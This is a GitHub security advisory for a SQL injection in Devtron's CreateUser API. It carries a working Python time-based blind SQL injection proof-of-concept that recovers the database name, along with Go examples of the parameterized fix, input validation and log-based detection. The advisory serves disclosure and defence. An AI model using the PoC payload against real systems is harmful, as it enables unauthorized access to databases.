GHSA-q78v-cv36-8fxj

Source
https://github.com/advisories/GHSA-q78v-cv36-8fxj
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-q78v-cv36-8fxj/GHSA-q78v-cv36-8fxj.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-q78v-cv36-8fxj
Aliases
Published
2024-11-07T17:14:04Z
Modified
2024-11-08T17:59:23.685058Z
Severity
  • 8.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
  • 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
Summary
Devtron has SQL Injection in CreateUser API
Details

Summary

An authenticated user with only minimum permissions can exploit a SQL injection in the CreateUser API (/orchestrator/user) to execute malicious SQL queries.

Details

The API is CreateUser (/orchestrator/user).

The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104

The userInfo parameter (line 104) is controlled by the user.

The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038

The query parameter (line 1038) is built from that user-controlled input, so a user can craft and execute a malicious SQL query.

The user must be authenticated but needs only minimum permissions: [image: screenshot of the minimum-permission user]
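The fix for this class of bug is to keep request data out of the SQL text entirely. The following is an added example written for this page, not Devtron's code: a simplified RoleFilter type whose field names follow the advisory's PoC payload (Devtron's real struct may differ), the unsafe string-formatted query pattern beside its parameterized form, and an assumed allowlist validator. The query text, table and column names, and the allowlist character class are illustrative assumptions, not Devtron's schema or its actual value set.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// RoleFilter is an assumed, simplified shape of one roleFilters entry from the
// CreateUser request body; field names follow the advisory's PoC, not Devtron's
// actual struct.
type RoleFilter struct {
	Team        string
	Environment string
	Action      string
	Entity      string
	AccessType  string
}

// buildLookupUnsafe shows the bug class: request fields are formatted straight
// into SQL text. A value like "'; select pg_sleep(1) --" closes the quoted
// literal, appends a second statement and comments out the rest.
// Table and column names are assumptions for illustration.
func buildLookupUnsafe(f RoleFilter) string {
	return fmt.Sprintf(
		"SELECT id FROM roles WHERE entity = '%s' AND access_type = '%s'",
		f.Entity, f.AccessType)
}

// buildLookupSafe is the hardened form: the SQL text is a constant with
// positional placeholders and the values travel separately, so the driver
// sends them as bound parameters and PostgreSQL never parses them as SQL.
// Execute with db.QueryRow(sql, args...) from database/sql.
func buildLookupSafe(f RoleFilter) (string, []any) {
	return "SELECT id FROM roles WHERE entity = $1 AND access_type = $2",
		[]any{f.Entity, f.AccessType}
}

// allowedValue is an assumed allowlist for filter fields: letters, digits,
// '-' and '_' only, at most 64 characters. Devtron's real value set is not
// known here; a production check would compare against the exact enum.
var allowedValue = regexp.MustCompile(`^[A-Za-z0-9_-]{0,64}$`)

// validateRoleFilter rejects a filter before it reaches the repository layer.
// This is defence in depth: it complements parameterisation, it does not
// replace it.
func validateRoleFilter(f RoleFilter) error {
	fields := map[string]string{
		"team": f.Team, "environment": f.Environment, "action": f.Action,
		"entity": f.Entity, "accessType": f.AccessType,
	}
	for name, v := range fields {
		if !allowedValue.MatchString(v) {
			return fmt.Errorf("roleFilters.%s: value %q is not allowed", name, v)
		}
	}
	return nil
}

// statementCount counts top-level statements in rendered SQL text; a value
// above 1 means user input changed the structure of the query.
func statementCount(sql string) int {
	n := 0
	for _, part := range strings.Split(sql, ";") {
		p := strings.TrimSpace(part)
		if p != "" && !strings.HasPrefix(p, "--") {
			n++
		}
	}
	return n
}

func main() {
	// Constructed hostile input shaped like the advisory's PoC payload.
	hostile := RoleFilter{Entity: "chart-group", AccessType: "'; select pg_sleep(1) --"}

	unsafe := buildLookupUnsafe(hostile)
	fmt.Printf("unsafe: %s\n  statements: %d\n", unsafe, statementCount(unsafe))

	safe, args := buildLookupSafe(hostile)
	fmt.Printf("safe:   %s\n  args: %q\n  statements: %d\n", safe, args, statementCount(safe))

	if err := validateRoleFilter(hostile); err != nil {
		fmt.Println("rejected:", err)
	}
}
```

With the hostile value the unsafe builder renders two statements, while the parameterized builder keeps one constant statement and hands the value to the driver as an argument; the validator rejects the value before either path runs.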

PoC

The following script demonstrates a time-based blind SQL injection that retrieves the database name:

import requests
import time
import string
import argparse

def blind(ip, token, query):
    # Inject through the accessType field of a roleFilters entry: the leading
    # quote closes the literal and "--" comments out the rest of the statement.
    url = f"http://{ip}/orchestrator/user"
    headers = {"token": token}
    entity = "chart-group"
    payload = f"'; {query} --"

    data = {"id": 111, "email_id": "abcd123@126.com", "superAdmin": False,
            "roleFilters": [{"team": "", "environment": "", "action": "",
                             "entity": entity, "accessType": payload}]}
    start = time.time()
    res = requests.post(url, headers=headers, json=data)
    end = time.time()
    #print(res.content)
    # A response delayed by more than one second means pg_sleep(1) ran,
    # i.e. the injected condition was true.
    return end - start > 1

def main(ip, token):
    chs = string.printable
    result = ""
    is_end = False
    i = 1
    # Recover the database name one character at a time; stop once no
    # printable character matches at position i.
    while not is_end:
        is_end = True
        for ch in chs:
            if blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;"):
                print(ch)
                result += ch
                is_end = False
                break
        i += 1
    print(result)

if __name__ == "__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument("--ip", "-i", type=str, help="Target IP")
    argparser.add_argument("--token", "-t", type=str, help="API TOKEN")
    args = argparser.parse_args()
    main(args.ip, args.token)

The debugging breakpoint indicated that the malicious SQL query was executed: [image: debugger breakpoint showing the injected query]

We can see that we can get the database name: [image: recovered database name]
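From the defender's side, the PoC's character-by-character timing probes leave a recognisable trace in PostgreSQL statement logs. The following added example (not part of the advisory or of the Devtron project) scans constructed log lines, assuming log_statement = 'all' and an assumed line prefix of the form "<ts> [<pid>] <user>@<db> LOG:  statement: <sql>", and flags three things: pg_sleep calls in statements issued by the application role, reads of system catalogs such as pg_database by that role, and one statement shape repeated with many distinct literal values from one user. The log lines, the statement text and the threshold are constructed for this example and were not captured from any real deployment.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed PostgreSQL statement log (log_statement = 'all') standing in for
// the orchestrator database's log; nothing here was captured from a real
// Devtron deployment. Assumed prefix: "<ts> [<pid>] <user>@<db> LOG:  statement: <sql>".
const sampleLog = `2024-11-07 17:14:04 UTC [4012] devtron@orchestrator LOG:  statement: SELECT id FROM users WHERE email_id = 'ops@example.com'
2024-11-07 17:14:05 UTC [4012] devtron@orchestrator LOG:  statement: SELECT id FROM roles WHERE entity = 'chart-group' AND access_type = ''; select case when substring(datname,1,1)='a' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1; --'
2024-11-07 17:14:06 UTC [4012] devtron@orchestrator LOG:  statement: SELECT id FROM roles WHERE entity = 'chart-group' AND access_type = ''; select case when substring(datname,1,1)='b' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1; --'
2024-11-07 17:14:07 UTC [4012] devtron@orchestrator LOG:  statement: SELECT id FROM roles WHERE entity = 'chart-group' AND access_type = ''; select case when substring(datname,1,1)='c' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1; --'
2024-11-07 17:14:08 UTC [4012] devtron@orchestrator LOG:  statement: SELECT id FROM roles WHERE entity = 'chart-group' AND access_type = ''; select case when substring(datname,1,1)='d' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1; --'
2024-11-07 17:14:10 UTC [4012] devtron@orchestrator LOG:  statement: SELECT id FROM roles WHERE entity = 'chart-group' AND access_type = ''; select case when substring(datname,1,1)='o' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1; --'
2024-11-07 17:14:12 UTC [4013] devtron@orchestrator LOG:  statement: UPDATE users SET updated_on = now() WHERE id = 111`

type entry struct {
	User, DB, SQL string
}

// Alert records one finding; Line is the 1-based line in the scanned log.
type Alert struct {
	Line   int
	User   string
	Reason string
}

var (
	lineRe    = regexp.MustCompile(`^\S+ \S+ \S+ \[\d+\] (\S+)@(\S+) LOG:\s+statement: (.*)$`)
	sleepRe   = regexp.MustCompile(`(?i)\bpg_sleep\s*\(`)
	catalogRe = regexp.MustCompile(`(?i)\bfrom\s+(pg_database|pg_user|pg_shadow|pg_roles|information_schema\.)`)
	literalRe = regexp.MustCompile(`'[^']*'`)
	numberRe  = regexp.MustCompile(`\b\d+\b`)
)

func parseLine(raw string) (entry, bool) {
	m := lineRe.FindStringSubmatch(raw)
	if m == nil {
		return entry{}, false
	}
	return entry{User: m[1], DB: m[2], SQL: m[3]}, true
}

// normalize reduces a statement to its shape: string literals become '?',
// numbers become N, whitespace is collapsed and case is folded.
func normalize(sql string) string {
	s := literalRe.ReplaceAllString(sql, "'?'")
	s = numberRe.ReplaceAllString(s, "N")
	return strings.ToLower(strings.Join(strings.Fields(s), " "))
}

// scan applies a per-line marker check (pg_sleep, catalog reads) and a repeat
// check that fires once when the same statement shape has been seen with
// `threshold` distinct literal sets from one user, the char-by-char pattern
// of the PoC. The threshold is a tuning assumption.
func scan(log string, threshold int) []Alert {
	var alerts []Alert
	variants := map[string]map[string]bool{}
	for i, raw := range strings.Split(strings.TrimSpace(log), "\n") {
		e, ok := parseLine(raw)
		if !ok {
			continue
		}
		var reasons []string
		if sleepRe.MatchString(e.SQL) {
			reasons = append(reasons, "pg_sleep in application statement")
		}
		if catalogRe.MatchString(e.SQL) {
			reasons = append(reasons, "system catalog read by application role")
		}
		if len(reasons) > 0 {
			alerts = append(alerts, Alert{Line: i + 1, User: e.User, Reason: strings.Join(reasons, "; ")})
		}
		key := e.User + "|" + normalize(e.SQL)
		if variants[key] == nil {
			variants[key] = map[string]bool{}
		}
		variants[key][e.SQL] = true
		if len(variants[key]) == threshold {
			alerts = append(alerts, Alert{Line: i + 1, User: e.User,
				Reason: fmt.Sprintf("same statement shape with %d distinct literal sets", threshold)})
		}
	}
	return alerts
}

func main() {
	for _, a := range scan(sampleLog, 5) {
		fmt.Printf("line %d user=%s: %s\n", a.Line, a.User, a.Reason)
	}
}
```

On the constructed log the two benign lines produce nothing, each of the five probe lines raises a marker alert, and the fifth distinct probe additionally raises the repeat alert. The repeat heuristic is the part that needs tuning against real traffic, since ORM-generated queries also share shapes; the pg_sleep and catalog checks are close to zero-noise for an application role that has no business calling either.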

Impact

SQL injection vulnerability. Our tests indicate that the latest version is affected.

Reported by Yuan Luo and Shuai Xiong of Tencent YunDing Security Lab.

Database specific
{
    "nvd_published_at": "2024-11-07T18:15:17Z",
    "cwe_ids": [
        "CWE-89"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-07T17:14:04Z"
}
References

Affected packages

Go / github.com/devtron-labs/devtron

Package

Name
github.com/devtron-labs/devtron
Purl
pkg:golang/github.com/devtron-labs/devtron

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
0.7.2